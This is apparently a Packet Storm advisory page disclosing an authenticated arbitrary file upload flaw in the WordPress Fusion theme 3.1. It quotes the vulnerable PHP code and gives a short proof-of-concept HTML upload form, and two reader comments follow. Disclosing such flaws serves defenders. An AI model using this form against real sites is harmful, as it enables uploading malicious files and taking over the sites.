exploit the possibilities

WordPress Fusion 3.1 Arbitrary File Upload

WordPress Fusion 3.1 Arbitrary File Upload
Posted Feb 13, 2015
Authored by Evex

WordPress Fusion theme version 3.1 suffers from a remote file upload vulnerability.

tags | exploit, remote, file upload
MD5 | a102bea6c53a81b928c710f5399b08b8

WordPress Fusion 3.1 Arbitrary File Upload

Change Mirror Download
------------------------------------------------------------------------------
WordPress Fusion Theme Authenicated Arbitrary File Upload
------------------------------------------------------------------------------


[-] Theme Link:

https://wordpress.org/themes/fusion ( Over 334,000 Downloads )
http://digitalnature.ro/themes/fusion/

[-] Affected Version:

Version 3.1


[-] Vulnerability Description:

The vulnerable code is located in the /functions script:
//SHORTENED CODE

function fusion_options() {

if ( 'fusion_save' == $_REQUEST['action'] ) {
if ($_FILES["file-logo"]["type"]){
$directory = $uploadpath['basedir'].'/';
move_uploaded_file($_FILES["file-logo"]["tmp_name"],
$directory . $_FILES["file-logo"]["name"]);
update_option('fusion_logoimage', $uploadpath['baseurl']. "/".
$_FILES["file-logo"]["name"]);
}

}
add_action('admin_menu', 'fusion_options');


then function fusion_options can be called by LOGGED IN USERS and executed
which leads to uploading any file on attacked server which may cause the
site full take over.


[-] Proof of Concept:

<form action="http://localhost/x/wordpress/wp-admin/admin.php"
method="post" enctype="multipart/form-data">
<input type="file" name="file-logo" />
<input type="hidden" name="action" value="fusion_save" />
<button type="submit" >Upload</button>
</form>

Comments (2)

RSS Feed Subscribe to this comment feed
evex

Sorry, its WordPress Fusion theme version 3.1 and not 1.9.1

Comment by evex
2015-02-14 14:35:26 UTC | Permalink | Reply
nelsone

I was looking at the changes in the fusion theme (3.1) and to me it appears the security has been purposefully weakend. If you compare the code of the functions.php file in 3.1 there appear to be a number of issues like the one you found and pointed out. It also appears you can now inject any upload path you want whereas you could not do that before. I would be a little suspicious about what has happened to this theme.

Comment by nelsone
2015-03-29 18:25:05 UTC | Permalink | Reply
Login or Register to post a comment

File Archive:

July 2019

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Jul 1st
    34 Files
  • 2
    Jul 2nd
    15 Files
  • 3
    Jul 3rd
    9 Files
  • 4
    Jul 4th
    8 Files
  • 5
    Jul 5th
    2 Files
  • 6
    Jul 6th
    3 Files
  • 7
    Jul 7th
    1 Files
  • 8
    Jul 8th
    15 Files
  • 9
    Jul 9th
    15 Files
  • 10
    Jul 10th
    20 Files
  • 11
    Jul 11th
    17 Files
  • 12
    Jul 12th
    16 Files
  • 13
    Jul 13th
    2 Files
  • 14
    Jul 14th
    1 Files
  • 15
    Jul 15th
    20 Files
  • 16
    Jul 16th
    27 Files
  • 17
    Jul 17th
    7 Files
  • 18
    Jul 18th
    5 Files
  • 19
    Jul 19th
    12 Files
  • 20
    Jul 20th
    0 Files
  • 21
    Jul 21st
    0 Files
  • 22
    Jul 22nd
    0 Files
  • 23
    Jul 23rd
    0 Files
  • 24
    Jul 24th
    0 Files
  • 25
    Jul 25th
    0 Files
  • 26
    Jul 26th
    0 Files
  • 27
    Jul 27th
    0 Files
  • 28
    Jul 28th
    0 Files
  • 29
    Jul 29th
    0 Files
  • 30
    Jul 30th
    0 Files
  • 31
    Jul 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2019 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close